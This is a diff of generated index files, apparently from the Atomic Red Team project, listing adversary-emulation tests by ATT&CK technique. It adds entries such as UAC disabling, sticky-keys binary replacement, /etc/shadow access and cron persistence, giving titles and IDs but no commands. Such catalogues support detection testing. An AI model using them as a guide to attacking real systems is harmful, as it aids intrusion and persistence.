+privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
@@ -69,6 +72,7 @@ defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelpe
 defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -205,6 +209,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c
 defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
 defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
+defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - Execute arbitrary PowerShell code,d590097e-d402-44e2-ad72-2c6aa1ce78b1,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
@@ -222,12 +227,14 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
-defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell
+defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
+defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell
 defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
 defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
 defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
 persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
+persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -252,6 +259,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
@@ -275,6 +283,7 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
+persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
@@ -371,6 +380,7 @@ discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall R
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
 discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
 discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
+discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
@@ -518,5 +528,6 @@ lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Man
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
 initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
@@ -7,6 +7,7 @@
 - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #2: Replace binary of sticky keys [windows]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
  - Atomic Test #1: Install AppInit Shim [windows]
@@ -31,6 +32,7 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+  - Atomic Test #8: Disable UAC using reg.exe [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -43,7 +45,8 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+  - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
@@ -137,6 +140,7 @@
 - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
+  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
 - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
  - Atomic Test #1: Make and modify binary from C source [macos, linux]
  - Atomic Test #2: Set a SetUID flag on file [macos, linux]
@@ -179,6 +183,7 @@
  - Atomic Test #2: Add command to .bashrc [macos, linux]
 - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #2: Replace binary of sticky keys [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #1: Admin Account Manipulate [windows]
  - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -225,7 +230,8 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+  - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
@@ -242,7 +248,8 @@
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1133 External Remote Services](../../T1133/T1133.md)
+  - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
@@ -326,6 +333,7 @@
 - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
+  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
 - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
  - Atomic Test #1: Shortcut Modification [windows]
  - Atomic Test #2: Create shortcut to cmd in startup folders [windows]
@@ -355,7 +363,9 @@
  - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]

 # credential-access
- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
+  - Atomic Test #1: Access /etc/shadow (Local) [linux]
+  - Atomic Test #2: Access /etc/passwd (Local) [linux]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
  - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -475,6 +485,7 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+  - Atomic Test #8: Disable UAC using reg.exe [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -771,6 +782,7 @@
 - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
+  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
 - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
  - Atomic Test #1: Make and modify binary from C source [macos, linux]
  - Atomic Test #2: Set a SetUID flag on file [macos, linux]
@@ -831,7 +843,8 @@
  - Atomic Test #1: Take ownership using takeown utility [windows]
  - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
  - Atomic Test #3: attrib - Remove read-only attribute [windows]
-  - Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows]
+  - Atomic Test #4: attrib - hide file [windows]
+  - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows]
 - [T1220 XSL Script Processing](../../T1220/T1220.md)
  - Atomic Test #1: MSXSL Bypass using local files [windows]
  - Atomic Test #2: MSXSL Bypass using remote files [windows]
@@ -1025,6 +1038,7 @@
  - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
  - Atomic Test #5: List Open Egress Ports [windows]
  - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
+  - Atomic Test #7: Qakbot Recon [windows]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #1: System Network Connections Discovery [windows]
  - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
@@ -1055,7 +1069,8 @@
 - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+  - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
 - [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md)
  - Atomic Test #1: Execute Commands [windows]
  - Atomic Test #2: Execute PowerShell script via Word DDE [windows]
@@ -1338,7 +1353,8 @@
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1133 External Remote Services](../../T1133/T1133.md)
+  - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -11,7 +11,8 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+  - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
 - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -65,7 +66,8 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+  - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
 - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -107,7 +109,9 @@
 - T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

 # credential-access
- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
+  - Atomic Test #1: Access /etc/shadow (Local) [linux]
+  - Atomic Test #2: Access /etc/passwd (Local) [linux]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
  - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -470,7 +474,8 @@
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
+  - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -9,7 +9,7 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
 - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -70,7 +70,7 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
 - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -321,7 +321,7 @@
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
-  - Atomic Test #2: Cron - Add script to cron folder [macos, linux]
+  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -4,6 +4,7 @@
 - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #2: Replace binary of sticky keys [windows]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
  - Atomic Test #1: Install AppInit Shim [windows]
@@ -26,6 +27,7 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+  - Atomic Test #8: Disable UAC using reg.exe [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -101,6 +103,7 @@
 - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
+  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
 - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
  - Atomic Test #1: Shortcut Modification [windows]
  - Atomic Test #2: Create shortcut to cmd in startup folders [windows]
@@ -142,6 +145,7 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+  - Atomic Test #8: Disable UAC using reg.exe [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -361,6 +365,7 @@
 - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
+  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
 - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
  - Atomic Test #1: mavinject - Inject DLL into running process [windows]
  - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
@@ -398,7 +403,8 @@
  - Atomic Test #1: Take ownership using takeown utility [windows]
  - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
  - Atomic Test #3: attrib - Remove read-only attribute [windows]
-  - Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows]
+  - Atomic Test #4: attrib - hide file [windows]
+  - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows]
 - [T1220 XSL Script Processing](../../T1220/T1220.md)
  - Atomic Test #1: MSXSL Bypass using local files [windows]
  - Atomic Test #2: MSXSL Bypass using remote files [windows]
@@ -408,6 +414,7 @@
 # persistence
 - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #2: Replace binary of sticky keys [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #1: Admin Account Manipulate [windows]
  - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -459,7 +466,8 @@
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1133 External Remote Services](../../T1133/T1133.md)
+  - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
@@ -516,6 +524,7 @@
 - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
  - Atomic Test #1: Service Registry Permissions Weakness [windows]
+  - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
 - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
  - Atomic Test #1: Shortcut Modification [windows]
  - Atomic Test #2: Create shortcut to cmd in startup folders [windows]
@@ -676,6 +685,7 @@
  - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
  - Atomic Test #5: List Open Egress Ports [windows]
  - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
+  - Atomic Test #7: Qakbot Recon [windows]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #1: System Network Connections Discovery [windows]
  - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
@@ -1017,7 +1027,8 @@
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1133 External Remote Services](../../T1133/T1133.md)
+  - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1,7 +1,7 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
